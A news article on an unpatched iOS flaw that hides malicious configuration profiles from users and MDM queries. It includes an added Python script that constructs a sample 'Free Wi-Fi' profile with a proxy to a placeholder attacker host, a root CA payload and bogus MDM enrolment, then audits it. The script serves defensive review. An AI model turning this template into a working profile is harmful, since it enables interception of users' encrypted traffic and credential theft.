iOS Vulnerability Leaves iPhones Open To ‘Invisible Malicious Profiles’

Apple has not yet patched a flaw that allows for the installation of invisible malicious configuration files, which could be used to spy on users

A weakness in Apple’s iOS operating system could allow an attacker to spy on a victim’s phone and hide their illicit activity, using what are known as “invisible malicious profiles”.

In the basic threat, detailed last year, hackers trick users into installing configuration profiles: property-list XML files (.mobileconfig) that carry settings for iOS functions such as Wi-Fi, email, VPN, proxies and certificate trust. Because a profile is delivered as an ordinary file and can be installed with a few taps, it needs no jailbreak and no App Store review.

But two “evolutions” of this threat were discussed by Israeli security firm Skycure at RSA 2014 conference today, one of which made the profiles invisible to the naked eye. Normally, a user can simply go to their profiles settings and delete any malicious ones, but a vulnerability in iOS could be exploited to make them invisible.

The invisible iOS threat

Yair Amit, chief technology officer and co-founder of Skycure, would not go into detail on how to exploit the flaw, other than to say Apple was working on a fix, which will likely appear in iOS 7.1. Apple had not responded to a request for comment at the time of publication.

The tech titan was told about the flaw back in September and it was hoped a patch would be issued in time for RSA 2014. But no fix has yet emerged, despite recent updates to iOS.

The threat of malicious profiles, which have already been seen in attacks by genuine online criminals, could be nasty. A profile can install a root CA certificate that iOS then trusts for SSL/TLS, and the same profile can carry a Wi-Fi, proxy or VPN payload that routes the device’s traffic through the attacker, who can then terminate and read connections the user believes are encrypted.

With that position on the wire it would be feasible for a hacker to completely compromise the Facebook, LinkedIn, mail and bank identities used by the target by stealing their credentials as they are sent.
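To make the risk concrete, here is an added example (not Skycure’s or Apple’s code) that builds a constructed “free Wi-Fi” .mobileconfig of the kind described above and audits it the way a reviewer should before tapping Install. The payload type strings (com.apple.security.root, com.apple.mdm, com.apple.wifi.managed) are Apple’s documented identifiers; the hostnames, UUIDs, certificate bytes and MDM topic are made up.

```python
"""Audit an iOS configuration profile (.mobileconfig) for payloads that can
put the profile's author in the middle of the device's TLS traffic.

Added example, not code from the article, Skycure or Apple. The sample
profile is constructed inline so the script runs offline."""
import plistlib

# Payload types worth flagging. The identifiers are Apple's documented ones;
# the descriptions are this script's own.
RISKY_PAYLOADS = {
    "com.apple.security.root": "installs a root CA the device will trust for SSL/TLS",
    "com.apple.security.pkcs1": "installs a certificate that may act as a CA",
    "com.apple.mdm": "enrolls the device with an MDM server that can query or wipe it",
    "com.apple.vpn.managed": "routes traffic through a VPN the profile author controls",
    "com.apple.proxy.http.global": "sends all HTTP(S) traffic through a proxy",
}


def build_sample_profile() -> bytes:
    """Constructed sample: a 'Free Wi-Fi' profile that also drops a root CA,
    points the Wi-Fi network at a proxy and enrolls the device in a bogus MDM.
    Hosts use the reserved .invalid TLD; the DER bytes are a placeholder."""
    fake_ca_der = b"\x30\x82\x01\x00" + b"\x00" * 16  # not a real certificate
    profile = {
        "PayloadType": "Configuration",
        "PayloadVersion": 1,
        "PayloadIdentifier": "com.example.freewifi",
        "PayloadUUID": "3B8C7E5A-1111-4222-8333-000000000001",
        "PayloadDisplayName": "Free Airport Wi-Fi",
        "PayloadOrganization": "Airport Services",
        "PayloadContent": [
            {   # looks harmless, but forces every connection through a proxy
                "PayloadType": "com.apple.wifi.managed",
                "PayloadVersion": 1,
                "PayloadIdentifier": "com.example.freewifi.wifi",
                "PayloadUUID": "3B8C7E5A-1111-4222-8333-000000000002",
                "SSID_STR": "Airport-Free-WiFi",
                "EncryptionType": "None",
                "AutoJoin": True,
                "ProxyType": "Manual",
                "ProxyServer": "proxy.example.invalid",  # assumed attacker host
                "ProxyServerPort": 8080,
            },
            {   # the root CA that lets that proxy terminate TLS unnoticed
                "PayloadType": "com.apple.security.root",
                "PayloadVersion": 1,
                "PayloadIdentifier": "com.example.freewifi.ca",
                "PayloadUUID": "3B8C7E5A-1111-4222-8333-000000000003",
                "PayloadContent": fake_ca_der,
            },
            {   # MDM enrolment: remote queries and wipe, as the article warns
                "PayloadType": "com.apple.mdm",
                "PayloadVersion": 1,
                "PayloadIdentifier": "com.example.freewifi.mdm",
                "PayloadUUID": "3B8C7E5A-1111-4222-8333-000000000004",
                "ServerURL": "https://mdm.example.invalid/mdm",
                "CheckInURL": "https://mdm.example.invalid/checkin",
                "Topic": "com.apple.mgmt.External.00000000-0000-0000-0000-000000000000",
                "AccessRights": 8191,  # every right bit set
            },
        ],
    }
    return plistlib.dumps(profile)


def audit_profile(blob: bytes) -> dict:
    """Return a ProfileList-style summary of the profile plus findings."""
    if blob[:1] == b"\x30":
        # A signed profile is a CMS/PKCS#7 DER blob; extract the inner plist
        # first (e.g. openssl smime -verify -noverify -in profile.mobileconfig -inform der).
        raise ValueError("signed profile: extract the inner plist before auditing")
    profile = plistlib.loads(blob)
    findings = []
    for payload in profile.get("PayloadContent", []):
        ptype = payload.get("PayloadType", "")
        ident = payload.get("PayloadIdentifier", "?")
        if ptype in RISKY_PAYLOADS:
            findings.append((ptype, ident, RISKY_PAYLOADS[ptype]))
        if ptype == "com.apple.wifi.managed" and payload.get("ProxyType") == "Manual":
            findings.append((ptype, ident, "Wi-Fi payload forces proxy %s:%s" % (
                payload.get("ProxyServer"), payload.get("ProxyServerPort"))))
    return {
        "display_name": profile.get("PayloadDisplayName"),
        "identifier": profile.get("PayloadIdentifier"),
        "uuid": profile.get("PayloadUUID"),
        "payload_types": [p.get("PayloadType") for p in profile.get("PayloadContent", [])],
        # True only on supervised devices, but worth surfacing when present
        "removal_disallowed": bool(profile.get("PayloadRemovalDisallowed", False)),
        "findings": findings,
    }


if __name__ == "__main__":
    report = audit_profile(build_sample_profile())
    print("%s (%s)" % (report["display_name"], report["identifier"]))
    for ptype, ident, why in report["findings"]:
        print("  [!] %-28s %s: %s" % (ptype, ident, why))
```

The summary fields mirror what an MDM server gets back from a ProfileList query (display name, identifier, UUID, payload types). Note what this does and does not give you: it inspects a profile file before installation, which is the point at which a user or admin can still say no; once a profile is hidden by the flaw Skycure describes, neither the Settings app nor ProfileList will show it, so this check is preventive, not a detection for an already compromised device.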

“We’ve seen attackers spread malicious profiles through email but also through websites. That is very effective. They impersonate legitimate services,” Amit told TechWeekEurope.

The other “evolution” of the threat involved bypassing mobile device management (MDM) systems, which enterprises traditionally rely on as a protective measure against app-based attacks and as an inventory of what is installed on a device. Even when the ProfileList MDM command is used to remotely query the profiles installed on a device, the malicious configuration profile stays invisible.

“Even when you use MDM to query installed profiles, you don’t see that. It looks like nothing is there, but the attack persists,” Amit said.

“An attacker could also impersonate the MDM server… because of the capabilities of MDM, as an attacker I can do some cool stuff, like query information from the device or even remotely wipe it when I want.”

The only way a user could feasibly get rid of the profile would be to reset a device to factory settings, according to Skycure.

It’s been a bad week for Apple’s security team, which also faced criticism over a serious SSL/TLS bug (the “goto fail” certificate-verification flaw in its SecureTransport library, patched in iOS 7.0.6) that let an attacker on the same network easily spy on supposedly encrypted connections.
